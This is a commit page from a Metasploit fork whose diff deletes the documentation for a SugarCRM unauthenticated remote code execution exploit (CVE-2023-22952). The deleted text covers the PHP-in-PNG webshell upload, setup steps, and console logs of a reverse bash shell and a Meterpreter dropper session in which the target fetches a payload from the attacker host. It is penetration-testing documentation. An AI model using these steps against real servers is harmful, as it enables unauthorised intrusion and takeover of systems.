adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added support for native PHP payloads and reengineered webshells

Browse Source
This commit is contained in:
h00die-gr3y
2023-02-16 12:36:56 +00:00
committed by Grant Willcox
parent c844d4d714
commit dc8ebb722a
2 changed files with 167 additions and 89 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/sugarcrm_webshell_cve_2023_22952.md
-178
View File
@@ -1,178 +0,0 @@
## Vulnerable Application
This module exploits a Remote Code Execution (RCE) vulnerability that has been identified in the SugarCRM application.
The vulnerability in sugarCRM could allows an unauthenticated attacker to upload a malicious `PNG` file with embedded PHP code
to the `/cache/images/` directory on the web server using the vulnerable endpoint `/index.php?module=EmailTemplates&action=AttachFiles`.
Once uploaded to the server, depending on server configuration, the attacker may be able to execute that code over the web
via http or https gaining access to the system.
The RCE is unauthenticated because of a missing authentication check in the `loadUser()` method in `include/MVC/SugarApplication.php`.
After a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application.
See this [AttackerKB Article](https://attackerkb.com/topics/E486ui94II/cve-2023-22952) for more details.
Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges
under which the web services run (typically `www-data`).
SugarCRM 11.0 Professional, Enterprise, Ultimate, Sell and Serve versions `11.0.4` and below are affected. Fixed in release `11.0.5`
SugarCRM 12.0 Enterprise, Sell and Serve versions `12.0.1` and below are affected. Fixed in release `12.0.2`.
Installing a vulnerable test bed requires a Linux machine with the vulnerable SugarCRM software loaded.
This module has been tested against a SugarCRM installation with the specifications listed below:
* SugarCRM Enterprise Edition
* Version: `11.0.4`
* Build: `300`
* Linux OS: Debian 8.6
`
## Verification Steps
1. `use exploit/linux/http/sugarcrm_webshell_cve_2023_22952`
1. `set RHOSTS <TARGET HOSTS>`
1. `set RPORT <port>`
1. `set LHOST <attacker host ip>`
1. `set LPORT <attacker host port>`
1. `set TARGET <0-Unix command or 1-Linux Dropper>`
1. `exploit`
1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
## Options
### WEBSHELL
You can use this option to set the filename and extension of the webshell.
This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
to bypass any security settings on the Web and PHP server.
## Scenarios
### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - bash reverse shell
```
msf6 > use exploit/linux/http/sugarcrm_webshell_cve_2023_22952
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > options
Module options (exploit/linux/http/sugarcrm_webshell_cve_2023_22952):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
lhost => 192.168.100.254
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
lport => 4444
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set target 0
target => 0
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted RPXrYGLCvGjL.phar
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000
whoami
www-data
exit
```
### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - Meterpreter session
```
msf6 > use exploit/linux/http/sugarcrm_webshell_cve_2023_22952
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > options
Module options (exploit/linux/http/sugarcrm_webshell_cve_2023_22952):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Dropper
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
lhost => 192.168.100.254
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
lport => 4444
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set target 1
target => 1
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.254:8080/aLYDt2
[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
[*] Sending stage (3045348 bytes) to 127.0.0.1
[+] Deleted ZxGTSVGsOUZs.phtml
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : sugarcrm
OS : Debian 8.6 (Linux 2.6.32)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
```
## Limitations
No `check` method.